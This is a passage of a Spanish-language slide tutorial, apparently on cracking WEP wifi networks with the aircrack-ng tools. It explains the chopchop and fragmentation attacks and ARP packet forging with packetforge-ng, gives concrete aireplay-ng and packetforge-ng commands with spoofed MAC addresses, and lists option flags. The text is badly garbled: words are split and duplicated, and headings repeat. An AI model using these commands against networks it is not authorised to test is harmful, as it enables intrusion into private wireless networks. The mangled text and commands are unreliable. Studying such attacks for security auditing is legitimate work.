transmitiendo, que debe coincidir con la MAC de tu tarjeta
wireless.
Una vez q
que inicias el comando vers algo
g como:
Desencriptamos un paquetes
aireplay-ng
i l -4
4 ath0
th0
Esto puede que no funcione, ya que en muchos casos los puntos de
acceso no aceptan los paquetes de datos porque no saben que MAC
se los est enviando
enviando. En este caso tenemos que usar la direccin MAC
de un cliente conectado que si va a tener permiso para enviar paquetes
de datos dentro de la red
aireplay-ng
p y g -4 -h 00:09:5B:EB:C5:2B ath0
Vamos a echar un vistazo a la direccin IP
tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading g from file replay
p y_dec-0627-022301.cap,
p, link-type
yp [[...]]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
AIREPLAY: FRAGMENTACIN
Con este ataque, cuando tiene xito, podemos obtener 1500 bits de un
PRGA (pseudo random generation algorithm). El PRGA es una parte de
un paquete que est formada por texto plano y texto cifrado
cifrado.
Este ataque no recupera la clave WEP por si mismo, simplemente sirve
para conseguir el PRGA. Despus podemos usar el PRGA para generar
paquetes con packetforge
packetforge-ngng.
Se requiere al menos un paquete de datos recibido del punto de acceso
para poder iniciar el ataque.
Bsicamente,, el programa
p g obtiene una p
pequea
q cantidad de informacin
sobre la clave de un paquete e intenta enviar un ARP y/o paquetes LLC
al punto de acceso (AP).
Si el paquete es recibido y contestado por el AP de forma satisfactoria,
entonces se podr obtener un poco ms de informacin sobre la clave
de ese nuevo paquete enviado por el AP. Este ciclo se repite varias
veces hasta que obtenemos los 1500 bits del PRGA o algunas veces se
obtienen menos de 1500 bitsbits.
FRAGMENTACIN
FRAGMENTACIN
FRAGMENTACIN
FRAGMENTACIN
FRAGMENTACIN
El programa responde esto (o similar):
AIRDECAP
AIRDECAP: ejemplos
PACKETFORGE
PACKETFORGE
PACKETFORGE
Opciones de origen:
-r <archivo> : leer paquete de este archivo
-y <archivo> : leer PRGA de este archivo
Modos:
arp : Crear paquete ARP (-0)
udp : Crear paquete UDP (-1)
icmp : Crear paquete ICMP (-2)
custom : Crear paquete a la medida (-9)
PACKETFORGE
Hay que obtener un archivo xor (PRGA) con el ataque chop chop o con
el ataque de fragmentacin.
Despus usar un comando como el siguiente:
packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D
-k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor
-w arp-requestt
-0 indica que quieres generar un paquete arp request
-a 00:14:6C:7E:40:80 es la direccin MAC del punto de acceso
-h
h 00:0F:B5:AB:CB:9D es la direccin MAC que quieres usar
-k 192.168.1.100 es la IP de destino. Por ejemplo en un paquete
arp es la frase Who has this IP
-l 192.168.1.1 es la IP de origen. Por ejemplo en un paquete arp
aparecer la frase Tell this IP
-y fragment-0124-161129.xor
-w arp-packet
PACKETFORGE
PACKETFORGE
PACKETFORGE
AIRTUN
AIRTUN
AIRTUN: WIDS
AIRTUN: WIDS
AIRTUN: doble AP
AIRTUN: doble AP
AIRTUN
Ventajas:
Normalmente se obtiene un paquete entero de 1500 bytes xor. Esto
significa que podemos crear otro paquete de cualquier tamao. Incluso
en los casos que obtenemos un paquete de menos de 1500 bytes, ser
suficiente para crear ARP requests.
Puede funcionar en situaciones en las que chopchop no lo hace.
Es extremadamente rpido.
Inconvenientes:
Se puede necesitar ms informacin para ejecutarlo, (direccin IP).
N ttodos
No d los
l drivers
di de
d tarjeta
t j t lo
l soportan.
t Por
P ejemplo,
j l hoy
h en da,
d
Atheros no genera el paquete correcto a menos que cambiemos la
direccin MAC de nuestra tarjeta wireless a la misma mac que
queremos utilizar.
S necesita
Se it estar
t fsicamente
f i t cerca del
d l punto
t de
d acceso porque sii se
pierde algn paquete fallar el ataque.
El ataque fallar en los puntos de acceso que no manejan los paquetes
fragmentados de forma adecuada.
Ventajas
Puede funcionar en algunos casos en los que no lo hace el
ataque de fragmentacin.
No se necesita conocer informacin acerca de ninguna IP.
Inconvenientes
No se puede usar contra todos los puntos de acceso.
El tamao mximo del xor en bits est limitado por la
longitud del paquete contra el que hagas el chopchop
chopchop. Aunque
en teora se pueden obtener 1500 bytes del xor stream, en la
prctica, raramente vers paquetes de 1500 bytes.
Mucho ms lento que el ataque de fragmentacin.
ATAQUE 4
Ataque de Korek
E t ataque
Este t no nos proporciona
i IV sino
IVs i que nos d da la
l
posibilidad de descifrar el contenido de un paquete (o lo
que es lo mismo, el Key Stream de cifrado).
No todos los puntos de acceso son vulnerables a este
ataque ya que este ataque necesita paquetes ms cortos
de 42 bytes y algunos AP rechazan paquetes menores a
60 bytes.
ATAQUE 5
Ataque de fragmentacin
Este ataque no proporciona la clave WEP, sino que nos
proporciona 1500 bytes de los cuales podemos extraer la
funcin de PRGA ((Pseud-Random Generation Algorithm),
g ),
y por tanto parte del Key Stream de cifrado.
Estos bytes nos servirn para generar paquetes vlidos
que pueden ser reinyectados para obtener IVIVss.
ANEXOS: airodump
ANEXOS: aireplay
Ataque
Ataque 0: Deautenticacin
Ataque 1: Falsa autenticacin
Ataque 2: Seleccin interactiva del paquete a enviar
Ataque 3: Reinyeccin de una peticin ARP (ARP-request)
Ataque 4: Ataque chopchop
Ataque 5: Ataque de Fragmentacin
ANEXOS: aireplay
Opciones de filtro:
-b bssid : Direccin MAC del p punto de acceso
-d dmac : Direccin MAC de destino
-s smac : Direccin MAC origen (source)
-m len : Longitud
g mnima del p paquete
q
-n len : Longitud mxima del paquete
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
ANEXOS: aireplay
Opciones de inyecin:
-xx nbpps : nmero de paquetes por segundo
-p fctrl : fijar palabra frame control (hexadecimal)
-a bssid : fijar direccin MAC del AP
-c dmac : fijar direccin MAC de destino
-hh smac : fijfijar di
direccin
i MAC origen
i
-e essid : ataque de falsa autenticacin: nombre del AP
-j : ataque arp-replay: inyectar paquetes FromDS
-gg valor : cambiar tamao de buffer (default: 8)
-k IP : fijar IP de destino en fragmentos
-l IP : fijar IP de origen en fragmentos
-o npckts : nmero de paquetes por burst (-1)
-q sec : segundos d entret paquetes
t sigo
i aqu o keep-alives
k li ((-1)
1)
-y prga : keystream para autenticacin compartida (shared key)
ANEXOS: aireplay
Opciones de origen:
-ii iface : capturar paquetes con esa interface
-r archivo : utilizar paquetes de ese archivo cap
Modos de ataque:
ANEXOS: aircrack